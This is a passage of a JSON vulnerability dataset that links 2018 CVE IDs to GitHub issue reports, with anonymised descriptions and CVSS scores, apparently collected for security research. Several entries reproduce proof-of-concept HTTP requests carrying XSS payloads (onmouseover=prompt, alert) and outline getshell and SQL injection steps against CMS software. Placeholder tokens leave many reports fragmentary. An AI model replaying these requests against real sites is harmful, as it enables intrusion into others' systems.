  26736. "description": "A hangs close to ten minutes in qpdf . hi,I find something maybe wrong in the newest qpdf. the poc file will cause the program to be hanged about ten minutes. Maybe this is a bug or feature? FILETAG and I found that it maybe caused by the APITAG in APITAG are some backtrace: ERRORTAG Looking forward to you reply,thx : )",
  26737. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  26738. "severity": "LOW",
  26739. "baseScore": 3.3,
  26740. "impactScore": 1.4,
  26741. "exploitabilityScore": 1.8
  26742. },
  26743. {
  26744. "CVE_ID": "CVE-2018-18023",
  26745. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1336",
  26746. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1336",
  26747. "Repo_new": "imagemagick/imagemagick",
  26748. "Issue_Created_At": "2018-10-05T12:06:20Z",
  26749. "description": "heap buffer overflow in APITAG of svg.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of svg.c Steps to Reproduce APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG a NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  26750. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26751. "severity": "MEDIUM",
  26752. "baseScore": 6.5,
  26753. "impactScore": 3.6,
  26754. "exploitabilityScore": 2.8
  26755. },
  26756. {
  26757. "CVE_ID": "CVE-2018-18025",
  26758. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1335",
  26759. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1335",
  26760. "Repo_new": "imagemagick/imagemagick",
  26761. "Issue_Created_At": "2018-10-05T12:00:14Z",
  26762. "description": "heap buffer overflow in APITAG of pict.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of pict.c Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffdad0: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa APITAG NUMBERTAG c NUMBERTAG fffdae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  26763. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26764. "severity": "MEDIUM",
  26765. "baseScore": 6.5,
  26766. "impactScore": 3.6,
  26767. "exploitabilityScore": 2.8
  26768. },
  26769. {
  26770. "CVE_ID": "CVE-2018-18074",
  26771. "Issue_Url_old": "https://github.com/requests/requests/issues/4716",
  26772. "Issue_Url_new": "https://github.com/psf/requests/issues/4716",
  26773. "Repo_new": "psf/requests",
  26774. "Issue_Created_At": "2018-06-27T09:06:49Z",
  26775. "description": "Should Authorization header be cleared in https > http redirect?. This may be considered intentional behaviour (in which case feel free to close this), but if a request is made to an https endpoint with authorization and it redirects to http on the same host, the Authorization header is not stripped and will be exposed on the wire. Expected Result rebuild_auth would strip the Authorization header if the scheme is changed from https to http. Actual Result The credentials that were intended to be sent over TLS were transmitted in plaintext with the redirected request. Reproduction Steps Run an HTTPS server on localhost NUMBERTAG that replies with a NUMBERTAG redirect to APITAG , and a plain HTTP server (or netcat) on localhost NUMBERTAG Then run APITAG The basic auth credentials are sent in plaintext to APITAG (the APITAG is just because I had a self signed cert). Here's the code I used for the SSL server: CODETAG System Information CODETAG",
  26776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26777. "severity": "HIGH",
  26778. "baseScore": 7.5,
  26779. "impactScore": 3.6,
  26780. "exploitabilityScore": 3.9
  26781. },
  26782. {
  26783. "CVE_ID": "CVE-2018-18082",
  26784. "Issue_Url_old": "https://github.com/caokang/waimai/issues/6",
  26785. "Issue_Url_new": "https://github.com/caokang/waimai/issues/6",
  26786. "Repo_new": "caokang/waimai",
  26787. "Issue_Created_At": "2018-10-09T14:17:18Z",
  26788. "description": "xss Vulnerability in Waimai Super Cms. xss Vulnerability in Waimai Super Cms In waimai Super Cms master, there is an XSS vulnerability via the PATHTAG and PATHTAG fname parameter. Payload: APITAG alert NUMBERTAG APITAG Exploit URL / Algorithm NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" sample APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" sss NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" furf APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fid NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" dsdd NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG",
  26789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26790. "severity": "MEDIUM",
  26791. "baseScore": 6.1,
  26792. "impactScore": 2.7,
  26793. "exploitabilityScore": 2.8
  26794. },
  26795. {
  26796. "CVE_ID": "CVE-2018-18086",
  26797. "Issue_Url_old": "https://github.com/SukaraLin/php_code_audit_project/issues/1",
  26798. "Issue_Url_new": "https://github.com/l1nk3rlin/php_code_audit_project/issues/1",
  26799. "Repo_new": "l1nk3rlin/php_code_audit_project",
  26800. "Issue_Created_At": "2018-10-09T07:13:32Z",
  26801. "description": "Empirecms NUMBERTAG getshell. The vulnerability trigger point is at the red frame in the image FILETAG Click System > System Settings > Manage Data Table to import your own mod file. APITAG Mod file content FILETAG finally getshell FILETAG",
  26802. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  26803. "severity": "HIGH",
  26804. "baseScore": 8.8,
  26805. "impactScore": 5.9,
  26806. "exploitabilityScore": 2.8
  26807. },
  26808. {
  26809. "CVE_ID": "CVE-2018-18087",
  26810. "Issue_Url_old": "https://github.com/Bixie/pagekit-portfolio/issues/44",
  26811. "Issue_Url_new": "https://github.com/bixie/pagekit-portfolio/issues/44",
  26812. "Repo_new": "bixie/pagekit-portfolio",
  26813. "Issue_Created_At": "2018-10-08T10:13:24Z",
  26814. "description": "Store XSS in image url field. Portfolio Version NUMBERTAG PHP Version NUMBERTAG Login user who has APITAG portfolio \" privilege can inject arbitrary web script or HTML via editor, XSS vulnerability will be triggered by visiting /portfolio/${project_title}. POC FILETAG FILETAG Title field also vulnerable to XSS,",
  26815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26816. "severity": "MEDIUM",
  26817. "baseScore": 5.4,
  26818. "impactScore": 2.7,
  26819. "exploitabilityScore": 2.3
  26820. },
  26821. {
  26822. "CVE_ID": "CVE-2018-18088",
  26823. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1152",
  26824. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1152",
  26825. "Repo_new": "uclouvain/openjpeg",
  26826. "Issue_Created_At": "2018-10-09T05:37:21Z",
  26827. "description": "OPENJPEG null ptr dereference in PATHTAG DESCRIPTION OPENJPEG null ptr dereference in PATHTAG VERSION OPENJPEG NUMBERTAG GDB Output NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG a0e1 in main (argc NUMBERTAG arg NUMBERTAG fffffffddf8) at PATHTAG NUMBERTAG ffff NUMBERTAG e7b NUMBERTAG in __libc_start_main (main NUMBERTAG ed APITAG , argc NUMBERTAG arg NUMBERTAG fffffffddf8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG aa in _start () GDB Information pwndbg> print red NUMBERTAG int NUMBERTAG pwndbg> print image APITAG NUMBERTAG OPJ_INT NUMBERTAG pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. poc Contact me if you need Poc file at EMAILTAG or EMAILTAG",
  26828. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26829. "severity": "MEDIUM",
  26830. "baseScore": 6.5,
  26831. "impactScore": 3.6,
  26832. "exploitabilityScore": 2.8
  26833. },
  26834. {
  26835. "CVE_ID": "CVE-2018-18190",
  26836. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/41",
  26837. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/41",
  26838. "Repo_new": "gopro/gpmf-parser",
  26839. "Issue_Created_At": "2018-10-09T04:09:19Z",
  26840. "description": "divide by zero crash. Caused by APITAG : APITAG if type not in APITAG APITAG will return NUMBERTAG Workaround: ERRORTAG APITAG Report: ERRORTAG Base NUMBERTAG encoded payload: ERRORTAG",
  26841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26842. "severity": "MEDIUM",
  26843. "baseScore": 5.5,
  26844. "impactScore": 3.6,
  26845. "exploitabilityScore": 1.8
  26846. },
  26847. {
  26848. "CVE_ID": "CVE-2018-18198",
  26849. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/422",
  26850. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/422",
  26851. "Repo_new": "redaxo/redaxo4",
  26852. "Issue_Created_At": "2018-09-25T07:56:34Z",
  26853. "description": "NUMBERTAG Reflected Cross site scripting (XSS) vulnerabilityin REDAXO NUMBERTAG details in PATHTAG CODETAG The value of $opener_input_field is obtained from an HTTP request and is a string. in PATHTAG ERRORTAG This directly outputs $opener_input_field to the js code. Causing XSS vulnerabilities. POC The user directly accesses the URL if the user has logged in. URLTAG XSS will be triggered as shown: APITAG FILETAG Credit: APITAG of APITAG",
  26854. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26855. "severity": "MEDIUM",
  26856. "baseScore": 6.1,
  26857. "impactScore": 2.7,
  26858. "exploitabilityScore": 2.8
  26859. },
  26860. {
  26861. "CVE_ID": "CVE-2018-18201",
  26862. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/2",
  26863. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/2",
  26864. "Repo_new": "yanchongchong/swallow",
  26865. "Issue_Created_At": "2018-10-08T03:53:50Z",
  26866. "description": "qibosoft_csrf. CODETAG",
  26867. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26868. "severity": "HIGH",
  26869. "baseScore": 8.8,
  26870. "impactScore": 5.9,
  26871. "exploitabilityScore": 2.8
  26872. },
  26873. {
  26874. "CVE_ID": "CVE-2018-18209",
  26875. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/59",
  26876. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/59",
  26877. "Repo_new": "chekun/dilicms",
  26878. "Issue_Created_At": "2018-10-10T09:49:17Z",
  26879. "description": "XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment. XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment Software Link : FILETAG POC : POST PATHTAG HTTP NUMBERTAG Host: localhost Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dili_session=xxxxx Connection: close Upgrade Insecure Requests NUMBERTAG APITAG .jpg NUMBERTAG B .gif NUMBERTAG B .png NUMBERTAG B APITAG Screenshots : FILETAG FILETAG FILETAG",
  26880. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26881. "severity": "MEDIUM",
  26882. "baseScore": 6.1,
  26883. "impactScore": 2.7,
  26884. "exploitabilityScore": 2.8
  26885. },
  26886. {
  26887. "CVE_ID": "CVE-2018-18215",
  26888. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/3",
  26889. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/3",
  26890. "Repo_new": "yanchongchong/swallow",
  26891. "Issue_Created_At": "2018-10-10T16:20:36Z",
  26892. "description": "youke NUMBERTAG csrf. CODETAG",
  26893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26894. "severity": "HIGH",
  26895. "baseScore": 8.8,
  26896. "impactScore": 5.9,
  26897. "exploitabilityScore": 2.8
  26898. },
  26899. {
  26900. "CVE_ID": "CVE-2018-18240",
  26901. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/454",
  26902. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/454",
  26903. "Repo_new": "pippo-java/pippo",
  26904. "Issue_Created_At": "2018-09-28T11:19:15Z",
  26905. "description": "Lead to RCE when unmarshal xml data with APITAG The APITAG unmarshal xml data based on APITAG it doesn't check the data; when the data contains malicious types,then it may leads to remote code execution; The Struts2 framework once had the same issue( URLTAG Using the following code snippet to convert the malicious xml data\uff1b CODETAG The malicious xml data is as follows\uff1a FILETAG The tool marshalsec( URLTAG can help to generate more kinds of payload including the one above; To mitigate the vulnerability,since version APITAG provides developers with some APIs(such APITAG to restrict the types be unmarshalled\uff1b Here we could fix the issue refer to the patch URLTAG of Struts2.",
  26906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26907. "severity": "CRITICAL",
  26908. "baseScore": 9.8,
  26909. "impactScore": 5.9,
  26910. "exploitabilityScore": 3.9
  26911. },
  26912. {
  26913. "CVE_ID": "CVE-2018-18242",
  26914. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/4",
  26915. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/4",
  26916. "Repo_new": "yanchongchong/swallow",
  26917. "Issue_Created_At": "2018-10-11T06:43:42Z",
  26918. "description": "youke NUMBERTAG SQL inject. CODETAG Using this packet test\u3002A SQL injection vulnerability exists in FILETAG",
  26919. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26920. "severity": "CRITICAL",
  26921. "baseScore": 9.8,
  26922. "impactScore": 5.9,
  26923. "exploitabilityScore": 3.9
  26924. },
  26925. {
  26926. "CVE_ID": "CVE-2018-18261",
  26927. "Issue_Url_old": "https://github.com/caokang/waimai/issues/7",
  26928. "Issue_Url_new": "https://github.com/caokang/waimai/issues/7",
  26929. "Repo_new": "caokang/waimai",
  26930. "Issue_Created_At": "2018-10-11T13:51:14Z",
  26931. "description": "xss Vulnerability in Waimai Super Cms NUMBERTAG ia fcname parameter. In waimai Super Cms NUMBERTAG there is an XSS vulnerability via the PATHTAG fcname parameter. Payload: APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG page_iframe_url= URLTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG fcname=form APITAG alert NUMBERTAG APITAG &fcsort NUMBERTAG",
  26932. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26933. "severity": "MEDIUM",
  26934. "baseScore": 6.1,
  26935. "impactScore": 2.7,
  26936. "exploitabilityScore": 2.8
  26937. },
  26938. {
  26939. "CVE_ID": "CVE-2018-18270",
  26940. "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
  26941. "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
  26942. "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
  26943. "Issue_Created_At": "2018-10-12T14:29:25Z",
  26944. "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_news_url parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors: m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" Dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" slugform1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; name=\"m1_extra\" Informative NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
  26945. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26946. "severity": "MEDIUM",
  26947. "baseScore": 6.1,
  26948. "impactScore": 2.7,
  26949. "exploitabilityScore": 2.8
  26950. },
  26951. {
  26952. "CVE_ID": "CVE-2018-18271",
  26953. "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
  26954. "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
  26955. "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
  26956. "Issue_Created_At": "2018-10-12T14:36:10Z",
  26957. "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_extra parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors:m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" Slugform NUMBERTAG Content Disposition: form data; name=\"m1_extra\" informative1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
  26958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26959. "severity": "MEDIUM",
  26960. "baseScore": 6.1,
  26961. "impactScore": 2.7,
  26962. "exploitabilityScore": 2.8
  26963. },
  26964. {
  26965. "CVE_ID": "CVE-2018-18274",
  26966. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/33",
  26967. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/33",
  26968. "Repo_new": "kermitt2/pdfalto",
  26969. "Issue_Created_At": "2018-10-12T07:47:10Z",
  26970. "description": "two bugs in pdfalto. I found two bugs in pdfalto, the details can be found at here URLTAG",
  26971. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26972. "severity": "HIGH",
  26973. "baseScore": 7.8,
  26974. "impactScore": 5.9,
  26975. "exploitabilityScore": 1.8
  26976. },
  26977. {
  26978. "CVE_ID": "CVE-2018-18308",
  26979. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/356",
  26980. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/356",
  26981. "Repo_new": "bigtreecms/bigtree-cms",
  26982. "Issue_Created_At": "2018-12-25T23:05:17Z",
  26983. "description": "CVETAG . I know that this is old case, but can you tell me in what version or commit this is fixed, thank you? FILETAG URLTAG",
  26984. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26985. "severity": "MEDIUM",
  26986. "baseScore": 6.1,
  26987. "impactScore": 2.7,
  26988. "exploitabilityScore": 2.8
  26989. },
  26990. {
  26991. "CVE_ID": "CVE-2018-18315",
  26992. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/175",
  26993. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/175",
  26994. "Repo_new": "xuhuisheng/lemon",
  26995. "Issue_Created_At": "2018-10-10T08:27:50Z",
  26996. "description": "\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG FILETAG APITAG FILETAG",
  26997. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  26998. "severity": "HIGH",
  26999. "baseScore": 7.5,
  27000. "impactScore": 3.6,
  27001. "exploitabilityScore": 3.9
  27002. },
  27003. {
  27004. "CVE_ID": "CVE-2018-18316",
  27005. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/5",
  27006. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/5",
  27007. "Repo_new": "yanchongchong/swallow",
  27008. "Issue_Created_At": "2018-10-12T03:06:58Z",
  27009. "description": "emlog_csrf. CODETAG",
